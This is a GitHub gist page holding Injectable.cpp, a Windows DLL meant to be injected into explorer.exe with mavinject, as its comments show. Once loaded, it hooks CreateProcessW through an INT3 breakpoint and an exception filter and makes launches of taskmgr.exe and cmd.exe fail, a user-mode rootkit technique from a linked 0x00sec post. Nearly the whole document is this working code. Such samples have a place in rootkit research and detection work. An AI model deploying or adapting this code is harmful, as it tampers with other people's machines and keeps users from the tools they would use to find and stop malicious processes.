Skip to content

Instantly share code, notes, and snippets.

@trietptm

trietptm/Injectable.cpp

Forked from anonymous/Injectable.cpp
Created December 20, 2017 13:55
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save trietptm/c4fc42de1cd3afcc18f70b5cc4f0da46 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save trietptm/c4fc42de1cd3afcc18f70b5cc4f0da46 to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. @invalid-email-address Anonymous created this gist Dec 18, 2017.
    75 changes: 75 additions & 0 deletions Injectable.cpp
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,75 @@
    #include <windows.h>
    #include <stdio.h>


    FARPROC fpCreateProcessW;
    BYTE bSavedByte;

    // Blog Post Here:
    // https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
    // tasklist | findstr explore.exe
    // mavinject 666 /INJECTRUNNING C:\Tools\Injectable.dll
    //

    BOOL WriteMemory(FARPROC fpFunc, LPCBYTE b, SIZE_T size) {
    DWORD dwOldProt = 0;
    if (VirtualProtect(fpFunc, size, PAGE_EXECUTE_READWRITE, &dwOldProt) == FALSE)
    return FALSE;

    MoveMemory(fpFunc, b, size);

    return VirtualProtect(fpFunc, size, dwOldProt, &dwOldProt);
    }


    VOID HookFunction(VOID) {
    fpCreateProcessW = GetProcAddress(LoadLibrary(L"kernel32"), "CreateProcessW");
    if (fpCreateProcessW == NULL) {
    return;
    }

    bSavedByte = *(LPBYTE)fpCreateProcessW;

    const BYTE bInt3 = 0xCC;
    if (WriteMemory(fpCreateProcessW, &bInt3, sizeof(BYTE)) == FALSE) {
    ExitThread(0);
    }
    }

    BOOL WINAPI MyCreateProcessW(LPCWSTR lpApplicationName, LPWSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation) {

    if (wcsstr(lpCommandLine, L"taskmgr.exe") != NULL ||
    wcsstr(lpCommandLine, L"cmd.exe") != NULL) {
    SetLastError(ERROR_ACCESS_DENIED);
    return FALSE;
    }

    if (WriteMemory(fpCreateProcessW, &bSavedByte, sizeof(BYTE)) == FALSE) {
    ExitThread(0);
    }

    BOOL b = CreateProcessW(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);

    HookFunction();
    return b;
    }

    LONG WINAPI MyUnhandledExceptionFilter(LPEXCEPTION_POINTERS lpException) {
    if (lpException->ContextRecord->Rip == (DWORD_PTR)fpCreateProcessW)
    lpException->ContextRecord->Rip = (DWORD_PTR)MyCreateProcessW;

    return EXCEPTION_CONTINUE_EXECUTION;
    }


    BOOL APIENTRY DllMain(HANDLE hInstance, DWORD fdwReason, LPVOID lpReserved) {
    switch (fdwReason) {
    case DLL_PROCESS_ATTACH:
    SetUnhandledExceptionFilter((LPTOP_LEVEL_EXCEPTION_FILTER)MyUnhandledExceptionFilter);
    ::MessageBoxA(NULL,"Boom!","Injected",0);
    HookFunction();
    break;
    }

    return TRUE;
    }